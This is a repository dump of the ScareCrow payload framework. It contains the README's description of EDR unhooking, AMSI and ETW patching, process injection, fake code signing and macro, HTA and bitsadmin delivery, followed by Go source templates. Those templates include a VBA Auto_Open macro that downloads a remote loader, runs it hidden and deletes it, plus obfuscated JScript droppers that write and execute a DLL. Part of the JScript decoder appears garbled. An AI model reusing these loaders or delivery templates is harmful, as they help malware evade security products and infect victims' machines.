69 | 70 | 71 | With these files and the go code, ScareCrow will cross compile them into DLLs using the c-shared library option. Once the DLL is compiled, it is obfuscated into a broken base64 string that will be embedded into a file. This allows for the file to be remotely pulled, accessed, and programmatically executed. 72 | 73 | ### Custom Attribute Files 74 | While ScareCrow has an extensive list of file attributes, there are some circumstances where a custom (maybe environment-specific) set of attributes is required. To accommodate this, ScareCrow allows for the inputting of a JSON file containing attributes. Using the `-configfile` command-line option, ScareCrow will use these attributes and filename instead of the pre-existing ones in ScareCrow. The file `main.json` contains a sample template of what the JSON structure needs to be to properly work. Note whatever you use as the "InternalName" will be the file name. 75 | 76 | 77 | 78 | ## Requirements 79 | ScareCrow now requires golang 1.19.1 or later to compile loaders. If you are running an older version, please use version 1.19.1 or later. 80 | 81 | See for new versions: https://golang.org/dl/. 82 | 83 | ## Install 84 | The first step as always is to clone the repo. Before you compile ScareCrow, you'll need to install the dependencies. 85 | 86 | To install them, run following commands: 87 | 88 | ``` 89 | go get github.com/fatih/color 90 | go get github.com/yeka/zip 91 | go get github.com/josephspurrier/goversioninfo 92 | go get github.com/Binject/debug/pe 93 | go get github.com/awgh/rawreader 94 | 95 | ``` 96 | Make sure that the following are installed on your OS: 97 | ``` 98 | openssl 99 | osslsigncode 100 | mingw-w64 101 | ``` 102 | 103 | Then build it 104 | 105 | ``` 106 | go build ScareCrow.go 107 | ``` 108 | In addition, ScareCrow utilizes [Garble](https://github.com/burrowers/garble) for obfuscating all loaders. 109 | 110 | Note: Several of the dependencies do not play well on Windows when compiling, because of this it is recommended to compile your loaders on OSX or Linux. 111 | 112 | 113 | 114 | 115 | ## Help 116 | 117 | ``` 118 | 119 | ./ScareCrow -h 120 | 121 | _________ _________ 122 | / _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __ 123 | \_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ / 124 | / \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) / 125 | /_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/ 126 | \/ \/ \/ \/ \/ 127 | (@Tyl0us) 128 | “Fear, you must understand is more than a mere obstacle. 129 | Fear is a TEACHER. the first one you ever had.” 130 | 131 | Usage of ./ScareCrow: 132 | -Evasion string 133 | Sets the type of EDR unhooking technique: 134 | [*] Disk - Retrives a clean version of the DLLs ".text" field from files stored on disk. 135 | [*] KnownDLL - Retrives a clean version of the DLLs ".text" field from the KnownDLLs directory in the object namespace. 136 | [*] None - The Loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls. (default "Disk") 137 | -Exec string 138 | Set the template to execute the shellcode: 139 | [*] RtlCopy - Using RtlCopy to move the shellcode into the allocated address in the current running process by making a Syscall. 140 | [*] ProcessInjection - Process Injection Mode. 141 | [*] NtQueueApcThreadEx - Executes the shellcode by creating an asynchronous procedure call (APC) to a target thread. 142 | [*] VirtualAlloc - Allocates shellcode into the process using custom syscalls in the current running process (default "RtlCopy") 143 | -I string 144 | Path to the raw 64-bit shellcode. 145 | -Loader string 146 | Sets the type of process that will sideload the malicious payload: 147 | [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading) 148 | [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated. 149 | [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions. 150 | [*] excel - Loads into a hidden Excel process using a JScript loader. 151 | [*] msiexec - Loads into MSIexec process using a JScript loader. 152 | [*] wscript - Loads into WScript process using a JScript loader. (default "binary") 153 | -O string 154 | Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required. 155 | -clone string 156 | Path to the file containing the certificate you want to clone 157 | -configfile string 158 | The path to a json based configuration file to generate custom file attributes. This will not use the default ones. 159 | -console 160 | Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. 161 | -delivery string 162 | Generates a one-liner command to download and execute the payload remotely: 163 | [*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader (Compatible with Binary, Control, Excel, and Wscript Loaders). 164 | [*] hta - Generates a blank hta file containing the loader along with an MSHTA command to execute the loader remotely in the background (Compatible with Control and Excel Loaders). 165 | [*] macro - Generates an office macro that will download and execute the loader remotely (Compatible with Control, Excel, and Wscript Loaders). 166 | -domain string 167 | The domain name to use for creating a fake code signing cert. (e.g. www.acme.com) 168 | -encryptionmode string 169 | Sets the type of encryption to encrypt the shellcode: 170 | [*] AES - Enables AES 256 encryption. 171 | [*] ELZMA - Enables ELZMA encryption. 172 | [*] RC4 - Enables RC4 encryption. (default "ELZMA") 173 | -export string 174 | For DLL Loaders Only - Specify an Export function for a loader to have. 175 | -injection string 176 | Enables Process Injection Mode and specify the path to the process to create/inject into (use \ for the path). 177 | -noamsi 178 | Disables the AMSI patching that prevents AMSI BufferScanner. 179 | -noetw 180 | Disables the ETW patching that prevents ETW events from being generated. 181 | -nosign 182 | Disables file signing, making -domain/-valid/-password parameters not required. 183 | -nosleep 184 | Disables the sleep delay before the loader unhooks and executes the shellcode. 185 | -obfu 186 | Enables Garbles Literal flag replaces golang libray strings with more complex variants, resolving to the same value at run-time. This creates a larger loader and times longer to compile 187 | -outpath string 188 | The path to put the final Payload/Loader once it's compiled. 189 | -password string 190 | The password for code signing cert. Required when -valid is used. 191 | -sandbox 192 | Enables sandbox evasion using IsDomainJoined calls. 193 | -url string 194 | URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/) 195 | -valid string 196 | The path to a valid code signing cert. Used instead -domain if a valid code signing cert is desired. 197 | ``` 198 | ## Loader 199 | The Loader determines the type of technique type used to load the shellcode into the target system. If no Loader option is chosen, ScareCrow will just compile a standard DLL file, that can be used by rundll32, regsvr32, or other techniques that utilize a DLL. ScareCrow utilizes three different types of loaders to load shellcode into memory: 200 | * Control Panel – This generates a control panel applet (i.e. Program and Features, or AutoPlay). By compiling the loader to have specific DLL export functions in combination with a file extension .cpl, it will spawn a control panel process (rundll32.exe) and the loader will be loaded into memory. 201 | * WScript – Spawns a WScript process that utilizes a manifest file and registration-free Com techniques to load (not inject) the DLL loader into its own process, side-by-side. This avoids registering the DLL in memory as the manifest file tells the process which, where, and what version of a DLL to load. 202 | * Excel – Generates an XLL file which are Excel-based DLL files that when loaded into Excel will execute the loader. A hidden Excel process will be spawned, forcing the XLL file to be loaded. 203 | * Msiexec - Spawns a hidden MSIExec process that will load the DLL into memory and execute the shellcode. 204 | 205 | 206 | ScareCrow can also generate binary based payloads if needed by using the `-Loader` command line option. These binaries do not benefit from any side-by-side loading techniques but serve as an additional technique to execute shellcode depending on the situation. 207 | 208 | 209 | ## Console 210 | ScareCrow utilizes a technique to first create the process and then move it into the background. This does two things, first it helps keep the process hidden and second, avoids being detected by any EDR product. Spawning a process right away in the background can be very suspicious and an indicator of maliciousness. ScareCrow does this by calling the ‘GetConsoleWindow’ and ‘ShowWindow’ Windows function after the process is created and the EDR’s hooks are loaded, and then changes the windows attributes to hidden. ScareCrow utilizes these APIs rather than using the traditional `-ldflags -H=windowsgui` as this is highly signatured and classified in most security products as an Indicator of Compromise. 211 | 212 | If the `-console` command-line option is selected, ScareCrow will not hide the process in the background. Instead, ScareCrow will add several debug messages displaying what the loader is doing. 213 | 214 | 215 | ## Execution Methods 216 | 217 | ScareCrow uses different templates to execute shellcode. To choose which template use the `-Exec` command-line option. These templates include: 218 | 219 | * RtlCopy 220 | * NtQueueApcThreadEx 221 | * VirtualAlloc 222 | * ProcessInjection 223 | 224 | ### Process Injection 225 | ScareCrow contains the ability to do process injection attacks. To avoid any hooking or detection in either the loader process or the injected process itself, ScareCrow first unhooks the loader process as it would normally, to ensure there are no hooks in the process. Once completed, the loader will then spawn the process specified in the creation command. Once spawned, the loader will then create a handle to the process to retrieve a list of loaded DLLs. Once it finds DLLs, it will enumerate the base address of each DLL in the remote process. Using the function WriteProcessMemory, the loader will then write the bytes of the system DLLs stored on disk (since they are “clean” of EDR hooks) without the need to change the memory permissions first. ScareCrow uses WriteProcessMemory because this function contains a feature primarily used in debugging where even if a section of memory is read-only, if everything is correct in the call to Write¬Process¬Memory, it will temporarily change the permission to read-write, update the memory section and then restore the original permissions. Once this is done, the loader can inject shellcode into the spawned process with no issue, as there are no EDR hooks in either process. 226 | 227 | This option can be used with any of the loader options. To enable process injection, use the `-injection` ccommand-line option along with the full path to the process you want to use to inject into. When putting the path in as an argument, it is important to either surround the full path with `""` or use double `\` for each directory in the path. 228 | 229 | 230 | 231 | ## AMSI & ETW Bypass 232 | ScareCrow contains the ability to patch AMSI (Antimalware Scan Interface) and ETW functions, preventing any event from being generated by the process. 233 | 234 | AMSI is a Windows native API that allows Windows Defender (or other antimalware products) to interface deep in the Windows operating system and provide enhanced protection, specifically around in-memory-based attacks. AMSI allows security products to better detect malicious indicators and help stop threats. Since AMSI is native to Windows, products don't need to "hook" AMSI, rather they load the necessary DLL to gain enhanced insight into the process. Because of this, ScareCrow loads the AMSI.dll DLL and then patches, to ensure that any results from the scanning interface come back clean. Patching AMSI is default in all loaders, if you wish to not patch AMSI use the `-noamsi` command-line option to disable it in your loader. 235 | 236 | ETW utilizes built-in Syscalls to generate this telemetry. Since ETW is also a native feature built into Windows, security products do not need to "hook" the ETW syscalls to gain the information. As a result, to prevent ETW, ScareCrow patches numerous ETW syscalls, flushing out the registers and returning the execution flow to the next instruction. Patching ETW is now default in all loaders, if you wish to not patch ETW, use the `-noetw` command-line option to disable it in your loader. 237 | 238 | Currently, these options only work for the parent process, if the `-injection` command-line option is used the primary process will patch AMSI and ETW but the injected process 239 | 240 | 241 | ## Encryption 242 | Encrypting shellcode is an important technique used to protect it from being detected and analyzed by EDRs and other security products. ScareCrow comes with multiple methods to encrypt shellcode, these include AES, ELZMA, and RC4. 243 | 244 | ### AES 245 | AES (Advanced Encryption Standard) is a symmetric encryption algorithm that is widely used to encrypt data. ScareCrow uses AES 256 bit size to encrypt the shellcode. The advantage of using AES to encrypt shellcode is that it provides strong encryption and is widely supported by cryptographic libraries. However, the use of a fixed block size can make it vulnerable to certain attacks, such as the padding oracle attack. 246 | 247 | ### ELZMA 248 | ELZMA is a compression and encryption algorithm that is often used in malware to obfuscate the code. To encrypt shellcode using ELZMA, the shellcode is first compressed using the ELZMA algorithm. The compressed data is then encrypted using a random key. The encrypted data and the key are then embedded in the exploit code. The advantage of using ELZMA to encrypt shellcode is that it provides both compression and encryption in a single algorithm. This can help to reduce the size of the exploit code and make it more difficult to detect. 249 | 250 | 251 | ### RC4 252 | RC4 is a symmetric encryption algorithm that is often used in malware to encrypt shellcode. It is a stream cipher that can use variable-length keys and is known for its simplicity and speed. 253 | 254 | 255 | ## Obfuscate 256 | Using `-obfu` ccommand-line option enables Garbles Literal flag during the compilation process. This replaces any golang library references and strings with a more complex version, that resolves to the same value during run-time. This process takes a longer time to complete, resulting in a larger GO file. Once the file is compiled ScareCrow parses the newly created file, stripping out any GO string-based IOCs. 257 | 258 | 259 | 260 | ## Delivery 261 | The delivery command-line argument allows you to generate a command or string of code (in the macro case) to remotely pull the file from a remote source to the victim’s host. These delivery methods include: 262 | * Bits – This will generate a bitsadmin command that downloads the loader remotely, executes it and removes it. This delivery command is compatible with Binary, Control, Excel and Wscript loaders. 263 | * HTA – This will generate a blank HTA file containing the loader. This option will also provide a command line that will execute the HTA remotely. This delivery command is compatible with Control and Excel loaders. 264 | * Macro – This will generate an Office macro that can be put into an Excel or Word macro document. When this macro is executed, the loader will be downloaded from a remote source and executed, and then removed. This delivery command is compatible with Control, Excel and Wscript loaders. (Please note that this method may take longer then the default timer depending on how slow the victim's endpoints available resources) 265 | 266 | 267 | 268 | ## To Do 269 | * Some older versions of Window's OSes (i.e. Windows 7 or Windows 8.1), have issues reloading the systems DLLs, as a result a version check is built in to ensure stability 270 | * Patch ETW and AMSI in Injected processes 271 | 272 | ## Credit 273 | * Special thanks to josephspurrier for his [repo](https://github.com/josephspurrier/goversioninfo) 274 | * Special thanks to mvdan for developing [Garble](https://github.com/burrowers/garble) 275 | * Special thanks to mvdan for developing [Binject](github.com/Binject/debug/pe) 276 | * Special thanks to modexp's detailed [article]("https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/") 277 | 278 | -------------------------------------------------------------------------------- /Struct/Struct.go: -------------------------------------------------------------------------------- 1 | package Struct 2 | 3 | func Sandbox() string { 4 | return ` 5 | func {{.Variables.IsDomainJoined}}() (bool, error) { 6 | var {{.Variables.domain}} *uint16 7 | var {{.Variables.status}} uint32 8 | err := syscall.NetGetJoinInformation(nil, &{{.Variables.domain}}, &{{.Variables.status}}) 9 | if err != nil { 10 | return false, err 11 | } 12 | syscall.NetApiBufferFree((*byte)(unsafe.Pointer({{.Variables.domain}}))) 13 | return {{.Variables.status}} == syscall.NetSetupDomainName, nil 14 | } 15 | ` 16 | } 17 | 18 | func Sandbox_DomainJoined() string { 19 | return ` 20 | var {{.Variables.checker}} bool 21 | {{.Variables.checker}}, _ = {{.Variables.IsDomainJoined}}() 22 | if {{.Variables.checker}} == true { 23 | } else { 24 | os.Exit(3) 25 | }` 26 | } 27 | 28 | func JS_Office_Export() string { 29 | return ` 30 | //export xlAutoOpen 31 | func xlAutoOpen() { 32 | Run() 33 | }` 34 | } 35 | 36 | func JS_Control_Export() string { 37 | return ` 38 | //export CPlApplet 39 | func CPlApplet() { 40 | Run() 41 | }` 42 | } 43 | 44 | func WS_JS_Export() string { 45 | return ` 46 | //export DllRegisterServer 47 | func DllRegisterServer() { 48 | Run() 49 | } 50 | 51 | //export DllGetClassObject 52 | func DllGetClassObject() { 53 | Run() 54 | } 55 | 56 | //export DllUnregisterServer 57 | func DllUnregisterServer() { 58 | Run() 59 | }` 60 | } 61 | 62 | func WScript_Sandbox() string { 63 | return ` 64 | var {{.Variables.objShell}} = new ActiveXObject("Shell.Application") 65 | var {{.Variables.domain}} = {{.Variables.objShell}}.GetSystemInformation("IsOS_DomainMember"); 66 | if ({{.Variables.domain}} == 0 ){ 67 | } 68 | else { 69 | {{.Variables.loader}} 70 | } 71 | ` 72 | } 73 | 74 | func HTA() string { 75 | return ` 76 | 77 | 78 | 79 | 84 | 85 | 86 | ` 87 | } 88 | 89 | func HTA_WScript() string { 90 | return ` 91 | 92 | 93 | 94 | 162 | 163 | 164 | ` 165 | } 166 | 167 | func JS_Office_Sub() string { 168 | return ` 169 | 170 | var {{.Variables.fso}} = new ActiveXObject("Scrip"+"ting.FileS"+"ystemObject"); 171 | var {{.Variables.dropPath}} = {{.Variables.fso}}.GetSpecialFolder(2); 172 | var {{.Variables.objapp}} = new ActiveXObject("{{.Variables.RegName}}.Application"); 173 | {{.Variables.objapp}}.Visible = false; 174 | var {{.Variables.Application_Version}} = {{.Variables.objapp}}.Version; 175 | var {{.Variables.WshShell}} = new ActiveXObject("WScript.Shell"); 176 | var {{.Variables.strRegPath}} = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + {{.Variables.Application_Version}} + "\\{{.Variables.RegName}}\\Options\\OPEN"; 177 | var {{.Variables.value}} = ""+{{.Variables.dropPath}}+"\\{{.Variables.FileName}}{{.Variables.dllext}}"; 178 | {{.Variables.WshShell}}.RegWrite({{.Variables.strRegPath}},{{.Variables.value}}, "REG_SZ"); 179 | var {{.Variables.objShell}} = new ActiveXObject("shell.application"); 180 | {{.Variables.objShell}}.ShellExecute("{{.Variables.ApplicationName}}", "", "", "open", 0); 181 | WScript.Sleep(40000); 182 | 183 | {{.Variables.WshShell}}.RegDelete({{.Variables.strRegPath}}); 184 | {{.Variables.WshShell}}.RegDelete("HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + {{.Variables.Application_Version}} + "\\{{.Variables.RegName}}\\Resiliency\\StartupItems\\"); 185 | 186 | ` 187 | } 188 | 189 | func JS_Control_Sub() string { 190 | return ` 191 | var {{.Variables.objShell}} = new ActiveXObject("sh"+"ell.applic"+"ation"); 192 | {{.Variables.objShell}}.ShellExecute({{.Variables.dropPath}}+"\\{{.Variables.FileName}}{{.Variables.dllext}}", "", "", "", 1); 193 | ` 194 | } 195 | 196 | func JS_Msiexec_Sub() string { 197 | return ` 198 | var {{.Variables.objShell}} = new ActiveXObject("she"+"ll.appl"+"ication"); 199 | {{.Variables.objShell}}.ShellExecute("C:\\Windows\\{{.Variables.System32}}\\msiexec.exe", "/z "+{{.Variables.dropPath}}+"\\{{.Variables.FileName}}{{.Variables.dllext}}", "", "", 1); 200 | ` 201 | } 202 | 203 | func JSfile() string { 204 | return ` 205 | try { 206 | 207 | var {{.Variables.fso}} = new ActiveXObject("Scripti"+"ng.FileSys"+"temObject"); 208 | var {{.Variables.dropPath}} = {{.Variables.fso}}.GetSpecialFolder(2); 209 | 210 | var {{.Variables.base6411}}={ {{.Variables.characters}}:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function({{.Variables.atest}}){ {{.Variables.base6411}}.{{.Variables.characters}};var {{.Variables.rtest}}="",{{.Variables.ctest}}=0;do{var {{.Variables.etest}}={{.Variables.atest}}.charCodeAt({{.Variables.ctest}}++),{{.Variables.ttest}}={{.Variables.atest}}.charCodeAt(c++),{{.Variables.htest}}=a.charCodeAt(c++),s=(e=e||0)>>2&63,A=(3&e)<<4|(t=t||0)>>4&15,o=(15&t)<<2|(h=h||0)>>6&3,B=63&h;t?h||(B=64):o=B=64,{{.Variables.rtest}}+={{.Variables.base6411}}.{{.Variables.characters}}.charAt(s)+{{.Variables.base6411}}.{{.Variables.characters}}.charAt(A)+{{.Variables.base6411}}.{{.Variables.characters}}.charAt(o)+{{.Variables.base6411}}.{{.Variables.characters}}.charAt(B)}while(c>>16&255,e=a>>>8&255,n=255&a,h[d/4]=String.fromCharCode(t,e,n),64==i&&(h[d/4]=String.fromCharCode(t,e)),64==o&&(h[d/4]=String.fromCharCode(t));return {{.Variables.rtest}}=h.join("")} 212 | function {{.Variables.binaryWriter}}({{.Variables.res1}},{{.Variables.filename1}}) 213 | {var {{.Variables.base6411}}decoded={{.Variables.Magic1}}({{.Variables.res1}});var {{.Variables.TextStream11}}=new ActiveXObject('A'+'D'+'O'+'D'+'B'+'.'+'S'+'t'+'r'+'e'+'a'+'m');{{.Variables.TextStream11}}.Type=2;{{.Variables.TextStream11}}.charSet='iso-8859-1';{{.Variables.TextStream11}}.Open();{{.Variables.TextStream11}}.WriteText({{.Variables.base6411}}decoded);var {{.Variables.BinaryStream}}=new ActiveXObject('A'+'D'+'O'+'D'+'B'+'.'+'S'+'t'+'r'+'e'+'a'+'m');{{.Variables.BinaryStream}}.Type=1;{{.Variables.BinaryStream}}.Open();{{.Variables.TextStream11}}.Position=0;{{.Variables.TextStream11}}.CopyTo({{.Variables.BinaryStream}});{{.Variables.BinaryStream}}.SaveToFile({{.Variables.filename1}},2);{{.Variables.BinaryStream}}.Close()} 214 | 215 | {{.Variables.dll}} 216 | 217 | {{.Variables.binaryWriter}}({{.Variables.dllvar}},{{.Variables.dropPath}}+"\\{{.Variables.FileName}}{{.Variables.dllext}}"); 218 | {{.Variables.Loader}} 219 | 220 | }catch(e) { 221 | } 222 | ` 223 | } 224 | 225 | func Macro() string { 226 | return `Sub Auto_Open() 227 | Dim {{.Variables.pathOfFile}} As String 228 | Dim {{.Variables.Full}} As String 229 | Dim {{.Variables.t}} As String 230 | {{.Variables.pathOfFile}} = Environ("AppData") & "\Microsoft\Excel\" 231 | VBA.ChDir {{.Variables.pathOfFile}} 232 | 233 | Dim {{.Variables.remoteFile}} As String 234 | Dim {{.Variables.storeIn}} As String 235 | Dim {{.Variables.HTTPReq}} As Object 236 | 237 | {{.Variables.remoteFile}} = "{{.Variables.URL}}{{.Variables.outFile}}" 238 | {{.Variables.storeIn}} = "{{.Variables.outFile}}" 239 | Set {{.Variables.HTTPReq}} = CreateObject("Microsoft.XMLHTTP") 240 | {{.Variables.HTTPReq}}.Open "GET", {{.Variables.remoteFile}}, False 241 | {{.Variables.HTTPReq}}.send 242 | 243 | If {{.Variables.HTTPReq}}.Status = 200 Then 244 | Set {{.Variables.output}} = CreateObject("ADODB.Stream") 245 | {{.Variables.output}}.Open 246 | {{.Variables.output}}.Type = 1 247 | {{.Variables.output}}.Write {{.Variables.HTTPReq}}.responseBody 248 | {{.Variables.output}}.SaveToFile {{.Variables.storeIn}}, 2 249 | {{.Variables.output}}.Close 250 | End If 251 | {{.Variables.Full}} = {{.Variables.pathOfFile}} & {{.Variables.storeIn}} 252 | Set {{.Variables.obj}} = GetObject("new:0006F03A-0000-0000-C000-000000000046") 253 | {{.Variables.obj}}.CreateObject("WScript.Shell").Run("c" & "s" & "c" & "r" & "i" & "p" & "t" & " //E:jscript " & {{.Variables.Full}}), 0 254 | {{.Variables.sleep}} 255 | Kill {{.Variables.Full}} 256 | End Sub 257 | Sub {{.Variables.sleep}}() 258 | Dim when As Variant 259 | Debug.Print "Start " & Now 260 | when = Now + TimeValue("00:00:30") 261 | Do While when > Now 262 | DoEvents 263 | Loop 264 | Debug.Print "End " & Now 265 | End Sub 266 | ` 267 | } 268 | 269 | func WS_JS() string { 270 | return ` 271 | var {{.Variables.manifest}} = ' '; 272 | 273 | var {{.Variables.ax}} = new ActiveXObject("Microsoft.Windows.ActCtx"); 274 | {{.Variables.ax}}.ManifestText = {{.Variables.manifest}}; 275 | var {{.Variables.Execute}} = {{.Variables.ax}}.CreateObject("{{.Variables.progid}}"); 276 | ` 277 | } 278 | 279 | func AESDecrypt_Function() string { 280 | return ` 281 | func {{.Variables.PKCS5UnPadding}}({{.Variables.src}} []byte) []byte { 282 | {{.Variables.length}} := len({{.Variables.src}}) 283 | {{.Variables.unpadding}} := int({{.Variables.src}}[{{.Variables.length}}-1]) 284 | return {{.Variables.src}}[:({{.Variables.length}} - {{.Variables.unpadding}} )] 285 | } 286 | 287 | func {{.Variables.FuncName}}() []byte { 288 | {{.Variables.ciphertext}} 289 | 290 | {{.Variables.vciphertext}}, _ := hex.DecodeString({{.Variables.fullciphertext}}) 291 | {{.Variables.vkey}}, _ := hex.DecodeString("{{.Variables.key}}") 292 | {{.Variables.viv}}, _ := hex.DecodeString("{{.Variables.iv}}") 293 | 294 | 295 | {{.Variables.block}}, _ := aes.NewCipher({{.Variables.vkey}}) 296 | 297 | {{.Variables.decrypted}} := make([]byte, len({{.Variables.vciphertext}})) 298 | {{.Variables.mode}} := cipher.NewCBCDecrypter({{.Variables.block}}, {{.Variables.viv}}) 299 | {{.Variables.mode}}.CryptBlocks({{.Variables.decrypted}}, {{.Variables.vciphertext}}) 300 | {{.Variables.stuff}} := {{.Variables.PKCS5UnPadding}}({{.Variables.decrypted}}) 301 | 302 | return {{.Variables.stuff}} 303 | } 304 | 305 | 306 | ` 307 | } 308 | func RCFDecrypt_Function() string { 309 | return ` 310 | func {{.Variables.FuncName}}() []byte { 311 | {{.Variables.ciphertext}} 312 | ciphertext, _ := hex.DecodeString({{.Variables.fullciphertext}}) 313 | key, _ := hex.DecodeString("{{.Variables.key}}") 314 | 315 | cipher, err := rc4.NewCipher(key) 316 | if err != nil { 317 | return nil 318 | } 319 | 320 | {{.Variables.raw_bin}} := make([]byte, len(ciphertext)) 321 | cipher.XORKeyStream({{.Variables.raw_bin}}, ciphertext) 322 | 323 | return {{.Variables.raw_bin}} 324 | 325 | } 326 | ` 327 | } 328 | 329 | func ELZMADecrypt_Function() string { 330 | return ` 331 | func {{.Variables.FuncName}}() []byte { 332 | {{.Variables.ciphertext}} 333 | var {{.Variables.buff}} bytes.Buffer 334 | {{.Variables.hexdata}}, _ := hex.DecodeString({{.Variables.fullciphertext}}) 335 | 336 | {{.Variables.buff2}} := bytes.NewBuffer({{.Variables.hexdata}}) 337 | 338 | {{.Variables.clear}}, {{.Variables.err}} := xz.NewReader({{.Variables.buff2}}) 339 | if {{.Variables.err}} != nil { 340 | log.Fatalf("NewReader error %s", {{.Variables.err}}) 341 | } 342 | io.Copy(&{{.Variables.buff}} , {{.Variables.clear}}) 343 | {{.Variables.raw_bin}} := {{.Variables.buff}}.Bytes() 344 | return {{.Variables.raw_bin}} 345 | } 346 | ` 347 | } 348 | 349 | func Imports() string { 350 | return ` 351 | {{.Variables.CPORT}} 352 | 353 | import ( 354 | {{.Variables.debugpeimport}} 355 | "encoding/base64" 356 | {{.Variables.HEX_Import}} 357 | {{.Variables.DebugImport}} 358 | "[loader]/[loader]" 359 | "strconv" 360 | {{.Variables.fmt}} 361 | "syscall" 362 | "unsafe" 363 | {{.Variables.Time_Import}} 364 | {{.Variables.SandboxOS}} 365 | 366 | 367 | {{.Variables.Windows_Import}} 368 | "golang.org/x/sys/windows/registry" 369 | {{.Variables.AdditionalImports}} 370 | ) 371 | ` 372 | } 373 | 374 | func Console() string { 375 | return ` 376 | 377 | func {{.Variables.Console}}(show bool) { 378 | {{.Variables.getWin}} := syscall.NewLazyDLL(string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2',})).NewProc({{.Variables.decode}}("{{.Variables.GetConsoleWindowName}}")) 379 | {{.Variables.showWin}} := syscall.NewLazyDLL(string([]byte{'u', 's', 'e', 'r', '3', '2',})).NewProc({{.Variables.decode}}("{{.Variables.ShowWindowName}}")) 380 | {{.Variables.hwnd}}, _, _ := {{.Variables.getWin}}.Call() 381 | if {{.Variables.hwnd}} == 0 { 382 | return 383 | } 384 | if show { 385 | var {{.Variables.SW_RESTORE}} uintptr = 9 386 | {{.Variables.showWin}}.Call({{.Variables.hwnd}}, {{.Variables.SW_RESTORE}}) 387 | } else { 388 | var {{.Variables.SW_HIDE}} uintptr = 0 389 | {{.Variables.showWin}}.Call({{.Variables.hwnd}}, {{.Variables.SW_HIDE}}) 390 | } 391 | } 392 | 393 | ` 394 | } 395 | 396 | func Header() string { 397 | return ` 398 | package main 399 | 400 | {{.Variables.Imports}} 401 | 402 | 403 | const ( 404 | {{.Variables.PROCESS_ALL_ACCESS}}= 0x1F0FFF 405 | ) 406 | var _ unsafe.Pointer 407 | var ( 408 | {{.Variables.customsyscall}} uint16 409 | {{.Variables.customsyscallVP}} uint16 410 | {{.Variables.number}} int = {{.Variables.b64number}} 411 | ) 412 | 413 | {{.Variables.Debug}} 414 | 415 | {{.Variables.Sandboxfunction}} 416 | 417 | func {{.Variables.Versionfunc}}() string { 418 | {{.Variables.k}}, _ := registry.OpenKey(registry.LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", registry.QUERY_VALUE) 419 | {{.Variables.Version}}, _, _ := {{.Variables.k}}.GetStringValue("CurrentVersion") 420 | {{.Variables.MV}}, _, err := {{.Variables.k}}.GetIntegerValue("CurrentMajorVersionNumber") 421 | if err == nil{ 422 | //{{.Variables.MinV}}, _, _ := {{.Variables.k}}.GetIntegerValue("CurrentMinorVersionNumber") 423 | {{.Variables.Version}} = strconv.FormatUint({{.Variables.MV}}, 10) 424 | } 425 | defer {{.Variables.k}}.Close() 426 | if {{.Variables.Version}} == "10" { 427 | {{.Variables.customsyscall}} = 0x18 428 | {{.Variables.customsyscallVP}} = 0x50 429 | } else if {{.Variables.Version}} == "6.3" { 430 | {{.Variables.customsyscall}} = 0x17 431 | {{.Variables.customsyscallVP}} = 0x4f 432 | } else if {{.Variables.Version}} == "6.2" { 433 | {{.Variables.customsyscall}} = 0x16 434 | {{.Variables.customsyscallVP}} = 0x4e 435 | } else if {{.Variables.Version}} == "6.1" { 436 | {{.Variables.customsyscall}} = 0x15 437 | {{.Variables.customsyscallVP}}= 0x4d 438 | } 439 | return {{.Variables.Version}} 440 | 441 | } 442 | 443 | func {{.Variables.decode}}({{.Variables.b64}} string,) string { 444 | var {{.Variables.decoded}} []byte 445 | {{.Variables.decoded}}, _ = base64.StdEncoding.DecodeString({{.Variables.b64}}) 446 | {{.Variables.sum}} := 1 447 | for i := 1; i < {{.Variables.number}}; i++ { 448 | {{.Variables.decoded}}, _ = base64.StdEncoding.DecodeString(string({{.Variables.decoded}})) 449 | {{.Variables.sum}} += i 450 | } 451 | return string({{.Variables.decoded}}) 452 | 453 | } 454 | 455 | {{.Variables.Console_Function}} 456 | 457 | {{.Variables.WriteProcessMemory_Function}} 458 | 459 | {{.Variables.ETW_Function}} 460 | 461 | {{.Variables.AMSI_Function}} 462 | 463 | var procReadProcessMemory = syscall.NewLazyDLL("kernel32.dll").NewProc("ReadProcessMemory") 464 | 465 | func {{.Variables.FindAddress}}() uintptr { 466 | var funcNtAllocateVirtualMemory = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l'})).NewProc("NtAllocateVirtualMemory") 467 | handle := uintptr(0xffffffffffffffff) 468 | num := 2 469 | var add uintptr 470 | AllAddr := funcNtAllocateVirtualMemory.Addr() 471 | for i := 0; i < 20; i++ { 472 | rawr, _, _ := ReadProcessMemory(handle, AllAddr+uintptr(i), uintptr(num)) 473 | f := fmt.Sprintf("%0x", rawr) 474 | if f == "0f05" { 475 | add = AllAddr + uintptr(i) 476 | return add 477 | } 478 | } 479 | return add 480 | } 481 | 482 | func ReadProcessMemory(hProcess uintptr, lpBaseAddress uintptr, nSize uintptr) (lpBuffer []uint8, lpNumberOfBytesRead int, ok bool) { 483 | var nBytesRead int 484 | buf := make([]uint8, nSize) 485 | ret, _, _ := procReadProcessMemory.Call( 486 | uintptr(hProcess), 487 | lpBaseAddress, 488 | uintptr(unsafe.Pointer(&buf[0])), 489 | nSize, 490 | uintptr(unsafe.Pointer(&nBytesRead)), 491 | ) 492 | 493 | return buf, nBytesRead, ret != 0 494 | } 495 | 496 | ` 497 | 498 | } 499 | 500 | func DLL_Refresher() string { 501 | return ` 502 | {{.Variables.Header}} 503 | 